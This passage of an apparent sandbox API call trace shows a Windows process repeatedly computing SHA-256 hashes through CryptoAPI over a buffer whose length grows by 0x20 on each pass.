dwDataLen=0x420, dwFlags=0x0) returned 1 [0119.353] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47030 [0119.353] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.353] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.353] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.354] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.354] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x440, dwFlags=0x0) returned 1 [0119.354] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47360 [0119.354] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.354] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.354] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.354] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.354] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x460, dwFlags=0x0) returned 1 [0119.354] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47390 [0119.354] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.354] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.354] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.355] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.355] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x480, dwFlags=0x0) returned 1 [0119.355] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47210 [0119.355] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.355] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.355] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.356] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.356] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0119.356] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e471b0 [0119.356] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.356] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.356] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.356] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.356] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0119.356] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47240 [0119.356] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.356] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.356] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.357] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.357] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0119.357] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e472a0 [0119.357] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.357] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.357] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.358] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.358] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x500, dwFlags=0x0) returned 1 [0119.358] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46d90 [0119.358] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.358] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.358] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.358] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.358] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x520, dwFlags=0x0) returned 1 [0119.358] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47420 [0119.358] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.358] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.358] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.359] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.359] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x540, dwFlags=0x0) returned 1 [0119.359] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e474b0 [0119.359] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.359] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.359] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.360] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.360] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x560, dwFlags=0x0) returned 1 [0119.360] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e472d0 [0119.360] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.360] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.360] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.360] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.360] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x580, dwFlags=0x0) returned 1 [0119.360] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47300 [0119.360] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.360] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.360] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.361] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.361] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0119.361] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46fd0 [0119.361] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.361] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.361] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.362] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.362] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0119.362] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e471e0 [0119.362] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.362] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.362] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.362] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.362] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0119.363] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47450 [0119.363] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.363] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.363] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.363] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.363] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x600, dwFlags=0x0) returned 1 [0119.363] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46e80 [0119.363] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.363] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.363] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.364] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.364] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x620, dwFlags=0x0) returned 1 [0119.364] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47480 [0119.364] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.364] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.364] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.364] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.364] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x640, dwFlags=0x0) returned 1 [0119.365] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46e50 [0119.365] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.365] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.365] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.365] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.365] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x660, dwFlags=0x0) returned 1 [0119.365] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47180 [0119.365] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.365] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.365] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.366] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.366] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x680, dwFlags=0x0) returned 1 [0119.366] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e473c0 [0119.366] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.366] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.366] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.366] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.366] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0119.367] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46eb0 [0119.367] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.367] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.367] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.367] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.367] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0119.367] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47060 [0119.367] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.367] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.367] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.368] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.368] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0119.368] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e473f0 [0119.368] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.368] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.368] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.368] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.368] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x700, dwFlags=0x0) returned 1 [0119.369] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47150 [0119.369] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.369] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.369] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.369] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.369] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x720, dwFlags=0x0) returned 1 [0119.369] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46d30 [0119.369] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.369] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.369] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.370] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.370] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x740, dwFlags=0x0) returned 1 [0119.370] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46d60 [0119.370] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.370] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.370] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.371] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.371] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x760, dwFlags=0x0) returned 1 [0119.371] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46dc0 [0119.371] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.371] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.371] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.371] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.371] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x780, dwFlags=0x0) returned 1 [0119.371] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46e20 [0119.371] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.371] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.371] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.372] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.372] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0119.372] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46ee0 [0119.372] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.372] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.372] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.373] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.373] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0119.373] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46f40 [0119.373] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.373] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.373] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.374] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.374] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0119.374] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46f10 [0119.374] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.374] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.374] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.374] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.374] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x800, dwFlags=0x0) returned 1 [0119.375] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46f70 [0119.375] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.375] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.375] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.375] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.375] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x820, dwFlags=0x0) returned 1 [0119.375] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e46fa0 [0119.375] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.375] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.375] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.376] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.376] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x840, dwFlags=0x0) returned 1 [0119.376] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47090 [0119.376] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.376] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.376] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.377] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.377] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x860, dwFlags=0x0) returned 1 [0119.377] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e470c0 [0119.377] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.377] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.377] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.377] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.377] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x880, dwFlags=0x0) returned 1 [0119.377] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e470f0 [0119.377] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.377] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.377] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.378] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.378] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0119.378] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47120 [0119.378] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.378] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.378] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.379] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.379] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0119.379] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e479c0 [0119.379] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.379] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.379] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.379] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.379] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0119.379] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47930 [0119.379] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.379] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.379] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.380] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.380] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x900, dwFlags=0x0) returned 1 [0119.380] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47b10 [0119.380] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.380] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.380] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xceaf0*=0x727e70) returned 1 [0119.381] CryptCreateHash (in: hProv=0x727e70, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xceae0 | out: phHash=0xceae0) returned 1 [0119.381] CryptHashData (hHash=0x7281e0, pbData=0x32e41680, dwDataLen=0x920, dwFlags=0x0) returned 1 [0119.381] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e47a20 [0119.381] CryptDestroyHash (hHash=0x7281e0) returned 1 [0119.381] CryptReleaseContext (hProv=0x727e70, dwFlags=0x0) returned 1 [0119.381] CryptAcquireContextW (in: phProv=0xceaf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, 